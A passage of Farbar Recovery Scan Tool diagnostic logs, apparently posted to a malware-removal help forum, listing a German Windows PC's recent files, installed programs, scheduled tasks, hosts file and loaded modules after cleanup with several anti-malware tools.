21:51 - 2014-12-06 22:34 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-12-05 21:51 - 2014-12-05 21:53 - 00000901 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\Program Files\ Malwarebytes Anti-Malware 2014-12-05 21:50 - 2014-11-21 06:14 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-12-05 21:50 - 2014-11-21 06:14 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-12-05 21:50 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-12-05 21:07 - 2014-12-06 15:35 - 00000110 _____ () C:\AdwCleanerDebug.txt 2014-12-05 21:04 - 2014-12-05 21:04 - 00000000 ____D () C:\TDSSKiller_Quarantine 2014-12-05 20:49 - 2014-12-05 20:49 - 00035992 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys 2014-12-05 19:40 - 2014-12-05 19:40 - 263670483 _____ () C:\Windows\MEMORY.DMP 2014-12-05 19:40 - 2014-12-05 19:40 - 00145784 _____ () C:\Windows\Minidump\Mini120514-01.dmp 2014-12-05 19:39 - 2014-12-05 19:39 - 00000000 ____D () C:\Temp 2014-12-05 13:33 - 2014-12-05 20:08 - 00000000 ____D () C:\ProgramData\HitmanPro 2014-12-04 20:43 - 2014-12-04 20:43 - 00000000 ____D () C:\Users\finja\AppData\Local\Microsoft Corporation 2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WEB.DE MailCheck 2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\Program Files\WEB.DE MailCheck 2014-11-27 22:42 - 2014-11-27 22:42 - 00000000 ____D () C:\Program Files\Microsoft ATS 2014-11-27 22:33 - 2014-11-27 22:33 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall (1).exe 2014-11-27 22:31 - 2014-11-27 22:31 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall.exe 2014-11-27 22:23 - 2014-11-27 22:23 - 00001998 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 7 Upgrade Advisor.lnk 2014-11-27 22:23 - 2014-11-27 22:23 - 00001986 _____ () C:\Users\Public\Desktop\Windows 7 Upgrade Advisor.lnk 2014-11-27 22:23 - 2014-11-27 22:23 - 00000000 ____D () C:\Program Files\Microsoft Windows 7 Upgrade Advisor 2014-11-27 21:25 - 2014-11-27 21:25 - 00000000 ____D () C:\Windows\system32\DesktopMBRText 2014-11-25 15:33 - 2014-12-05 20:32 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-11-19 21:31 - 2014-10-24 02:03 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2014-11-13 14:27 - 2014-11-13 14:27 - 00000951 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2014-11-13 13:30 - 2014-11-13 13:30 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-11-13 13:25 - 2014-11-13 13:25 - 00000000 ____D () C:\Windows\ERUNT 2014-11-13 13:15 - 2014-12-06 15:37 - 00000000 ____D () C:\AdwCleaner 2014-11-13 12:54 - 2014-12-05 13:56 - 00001356 _____ () C:\Users\finja\AppData\Local\d3d9caps.dat 2014-11-12 23:01 - 2014-10-10 02:01 - 00449536 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll 2014-11-12 23:01 - 2014-10-10 02:00 - 01259008 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2014-11-12 23:01 - 2014-10-10 02:00 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll 2014-11-12 23:01 - 2014-10-10 00:22 - 00619520 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll 2014-11-12 22:59 - 2014-09-19 01:50 - 00278528 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2014-11-12 22:59 - 2014-08-27 01:55 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll 2014-11-12 22:59 - 2014-08-27 01:55 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll 2014-11-12 22:56 - 2014-08-12 03:25 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL 2014-11-12 22:53 - 2014-10-18 02:08 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2014-11-12 22:53 - 2014-10-03 02:18 - 00274432 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00396800 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00170496 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll 2014-11-12 07:47 - 2014-10-24 02:04 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll 2014-11-12 07:45 - 2014-10-13 00:34 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2014-11-11 22:20 - 2014-10-27 20:10 - 12366848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-11-11 22:20 - 2014-10-27 20:05 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-11-11 22:20 - 2014-10-27 20:02 - 09739776 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-11-11 22:20 - 2014-10-27 19:59 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-11-11 22:20 - 2014-10-27 19:59 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-11-11 22:20 - 2014-10-27 19:58 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-11-11 22:20 - 2014-10-27 19:57 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll 2014-11-11 22:20 - 2014-10-27 19:57 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 01802752 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2014-11-11 22:20 - 2014-10-27 19:55 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2014-11-11 22:20 - 2014-10-27 19:55 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe 2014-11-11 22:20 - 2014-10-27 19:55 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe 2014-11-11 22:20 - 2014-10-27 19:54 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2014-11-11 08:42 - 2014-11-11 08:42 - 00000000 ____D () C:\Users\finja\AppData\Roaming\AdvancedSystemProtector 2014-11-10 21:27 - 2014-12-05 19:40 - 00000000 ____D () C:\Windows\Minidump 2014-11-08 21:59 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7 2014-11-06 21:02 - 2014-11-06 21:02 - 00000000 ____D () C:\Users\finja\AppData\Local\Macromedia 2014-11-06 20:30 - 2014-11-06 20:30 - 00000003 _____ () C:\Users\finja\Downloads\C ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-12-06 21:13 - 2009-02-27 09:31 - 01243199 _____ () C:\Windows\WindowsUpdate.log 2014-12-06 20:56 - 2009-02-27 10:20 - 00000000 _____ () C:\Windows\system32\LogConfigTemp.xml 2014-12-06 20:55 - 2006-11-02 14:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-12-06 20:55 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 2014-12-06 20:55 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 2014-12-06 20:54 - 2006-11-02 14:01 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT 2014-12-06 17:42 - 2014-10-05 12:36 - 00000008 __RSH () C:\ProgramData\ntuser.pol 2014-12-06 17:40 - 2014-06-08 13:02 - 00140754 _____ () C:\Windows\PFRO.log 2014-12-06 17:36 - 2009-05-16 15:26 - 00000000 ____D () C:\Users\finja 2014-12-06 17:35 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\GroupPolicy 2014-12-06 16:09 - 2013-11-26 19:43 - 00000000 ____D () C:\Windows\TempDF28D6CC-3D1E-B803-1F4F-B4B1FD7BEC31-Signatures 2014-12-06 15:38 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\PLA 2014-12-05 22:17 - 2014-10-28 11:28 - 00000000 ____D () C:\ProgramData\83b32e09-56dd-4d15-bbc7-350e8627ec65 2014-12-05 21:41 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\LogFiles 2014-12-05 20:49 - 2014-11-02 19:50 - 00000000 ____D () C:\Windows\system32\JREMetafilePublic 2014-12-05 13:34 - 2008-01-21 08:16 - 01598580 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-11-28 20:51 - 2011-04-11 19:26 - 00000000 ____D () C:\Program Files\1und1Softwareaktualisierung 2014-11-26 18:48 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Roaming\Macromedia 2014-11-26 18:28 - 2008-08-15 00:15 - 00000000 ____D () C:\ProgramData\Adobe 2014-11-13 14:30 - 2014-11-04 07:52 - 00000000 ____D () C:\Program Files\Mozilla Firefox 2014-11-13 14:29 - 2008-08-15 00:11 - 00000000 ____D () C:\Program Files\Google 2014-11-13 14:27 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Local\Google 2014-11-13 14:25 - 2014-11-04 07:59 - 00000000 ____D () C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394 2014-11-13 13:55 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\rescache 2014-11-13 13:46 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\Microsoft.NET 2014-11-13 13:18 - 2011-04-11 19:27 - 00000885 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WEB.DE.lnk 2014-11-12 23:04 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\de-DE 2014-11-12 23:01 - 2008-08-15 00:16 - 00000000 ____D () C:\ProgramData\Microsoft Help 2014-11-12 22:52 - 2013-08-02 19:19 - 00000000 ____D () C:\Windows\system32\MRT 2014-11-12 22:47 - 2014-06-04 20:19 - 00000106 _____ () C:\Users\finja\AppData\Roaming\WB.CFG 2014-11-12 22:39 - 2006-11-02 11:24 - 100445232 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe 2014-11-12 22:27 - 2006-11-02 11:23 - 00000321 _____ () C:\Windows\win.ini 2014-11-12 14:45 - 2006-11-02 13:47 - 00393944 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-11-08 21:15 - 2014-11-02 19:57 - 00000000 ___HD () C:\Users\Public\Temp 2014-11-06 20:56 - 2014-11-02 19:50 - 00000000 ____D () C:\Program Files\Free Flash Plugin 2014-11-06 20:49 - 2012-08-10 17:12 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe 2014-11-06 20:49 - 2011-12-26 19:46 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl 2014-11-06 20:49 - 2009-05-16 16:07 - 00000000 ____D () C:\Users\finja\AppData\Local\Adobe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\explorer.exe => File is digitally signed C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-12-06 21:02 ==================== End Of Log ============================ --- --- --- Code:
ATTFilter Additional scan result of Farbar Recovery Scan Tool (x86) Version: 06-12-2014 02
Ran by finja at 2014-12-06 22:37:27
Running from C:\Users\finja\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
32 Bit HP CIO Components Installer (Version: 6.1.2 - Hewlett-Packard) Hidden
Activation Assistant for the 2007 Microsoft Office suites (HKLM\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Activation Assistant for the 2007 Microsoft Office suites (Version: 1.0 - Microsoft Corporation) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.3.0.3650 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: Version 7.0.1101.18 - Alps Electric)
Bookworm Deluxe (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110113233}) (Version: - Oberon Media)
Bricks of Egypt (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11029123}) (Version: - Oberon Media)
Build-a-lot (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113537610}) (Version: - Oberon Media)
Cake Mania (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111199750}) (Version: - Oberon Media)
Chuzzle (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110411970}) (Version: - Oberon Media)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110305887}) (Version: - Oberon Media)
DJ_AIO_06_F4500_SW_MIN (Version: 140.0.690.000 - Hewlett-Packard) Hidden
Dream Day First Home (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version: - Oberon Media)
eDeals version 1.0 (HKLM\...\eDeals_is1) (Version: 1.0 - eDeals)
eMachines (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11019760}) (Version: - Oberon Media)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
eMachines ScreenSaver (HKLM\...\{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}) (Version: 1.02.0902 - Acer Incorporated)
Galapago (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111307457}) (Version: - Oberon Media)
Garmin BaseCamp (HKLM\...\{7C69F731-6471-48FE-899B-1C40F80042C7}) (Version: 4.4.2 - Garmin Ltd or its subsidiaries)
Garmin City Navigator Europe NT 2012.20 Update (HKLM\...\{6D3A83A6-8F72-4354-A80D-721D1E54FC76}) (Version: 15.20.0.0 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM\...\{ABA5E381-EC46-425C-86C5-5CD15BBFB4BF}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GearDrvs (Version: 1.00.0000 - GEAR Software) Hidden
HP Deskjet F4500 All-in-One Driver 14.0 Rel. 6 (HKLM\...\{0AFFEA39-60AF-4C4F-BB47-4A1F7CB12129}) (Version: 14.0 - HP)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{20471B27-D702-4FE8-8DEC-0702CC8C0A85}) (Version: 8.0-B9.498 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.0-B9.498 - InterVideo Inc.) Hidden
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Konz 2013 (HKLM\...\InstallShield_{76651FD7-2B71-4B61-9F3A-E82F52F08D92}) (Version: 1.00.0000 - USM)
Konz 2013 (Version: 1.00.0000 - USM) Hidden
Launch Manager (HKLM\...\LManager) (Version: - )
LightScribe 1.4.142.1 (Version: 1.4.142.1 - hxxp://www.lightscribe.com) Hidden
Luxor (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111265347}) (Version: - Oberon Media)
Mahjong Escape Ancient China (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111252743}) (Version: - Oberon Media)
Malwarebytes Anti-Malware Version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 Language Pack SP1 - DEU (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - deu) (Version: - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Automated Troubleshooting Services Shim (HKLM\...\{c9920352-04e6-469d-bab8-e2b9c7c75415}.sdb) (Version: - )
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM\...\{95140000-007A-0407-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM\...\{4EA2F95F-A537-4d17-9E7F-6B3FF8D9BBE3}) (Version: 08.05.0822 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
myphotobook.de (HKLM\...\de.myphotobook.creator.001F9DF2D0BAABEB11F42CCEE43224607B61109C.1) (Version: 1.4.3 - myphotobook GmbH)
myphotobook.de (Version: 1.4.3 - myphotobook GmbH) Hidden
Network (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NTI Media Maker 8 (HKLM\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6325 - NewTech Infosystems)
NTI Media Maker 8 (Version: 8.0.12.6325 - NewTech Infosystems) Hidden
Ravensburger tiptoi (HKLM\...\Ravensburger tiptoi) (Version: - )
Scan (Version: 140.0.80.000 - Hewlett-Packard) Hidden
Segoe UI (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Steuer 2012 (HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\{01159E8A-44F7-4885-A7F9-872CE4D74063}) (Version: 20.00.8137 - Buhl Data Service GmbH)
Toolbox (Version: 140.0.428.000 - Hewlett-Packard) Hidden
Turbo Pizza (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113009953}) (Version: - Oberon Media)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version: - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version: - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version: - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version: - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version: - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version: - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version: - Microsoft)
WEB.DE Desktop Icons (HKLM\...\1&1 Mail & Media GmbH 1und1DesktopIconsInstaller) (Version: 3.0.5.0 - 1&1 Mail & Media GmbH)
WEB.DE MailCheck für Internet Explorer (HKLM\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.0.4 - 1&1 Mail & Media GmbH)
WEB.DE Softwareaktualisierung (HKLM\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.1.0 - 1&1 Mail & Media GmbH)
Windows 7 Upgrade Advisor (HKLM\...\{9A4D182C-35C7-4791-8484-4304EBC9101A}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
==================== Restore Points =========================
05-12-2014 19:07:39 Prüfpunkt von HitmanPro
05-12-2014 19:31:46 Prüfpunkt von HitmanPro
06-12-2014 17:21:14 Geplanter Prüfpunkt
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2006-11-02 11:23 - 2014-12-06 09:03 - 00000732 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {1245B223-395D-46A5-93D1-C9AE1D55861B} - System32\Tasks\Registration 1und1 Task => C:\Program Files\1und1Softwareaktualisierung\cdsupdclient.exe [2014-03-31] (1&1 Mail & Media GmbH)
Task: {5E8F5D12-D836-4FA2-A55F-60B345663AEB} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Signature Update => c:\program files\windows defender\MpCmdRun.exe [2008-01-21] (Microsoft Corporation)
Task: {B2DE553E-4F93-444A-B89F-264EA7144119} - System32\Tasks\1und1 Konfiguration => C:\ProgramData\1und1InternetExplorerAddon\ConfigTask.exe [2011-03-16] (1und1 Mail und Media GmbH)
Task: {FCE905A1-631D-4DC4-B40B-06BCB2DE0B4A} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - finja => C:\Program Files\Windows Calendar\WinCal.exe [2009-04-11] (Microsoft Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Loaded Modules (whitelisted) =============
2009-02-27 10:19 - 2008-06-11 11:18 - 00024576 _____ () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
2009-02-27 10:19 - 2009-02-27 10:19 - 00032768 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.Controller\3.0.3009.0__14bcaafdb44b5951\Framework.Model.Controller.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00009216 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.ControllerInterface\3.0.3009.0__d842b71b4d6ed079\Framework.Model.ControllerInterface.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00061440 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Library\3.0.3009.0__3036420f80dd6947\Framework.Library.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00015360 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Host\3.0.3009.0__672b450de5a7e94a\Framework.Host.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00006144 _____ () C:\Windows\assembly\GAC_MSIL\Framework.PluginInterface\3.0.3009.0__9ecdf03bb2054f94\Framework.PluginInterface.dll
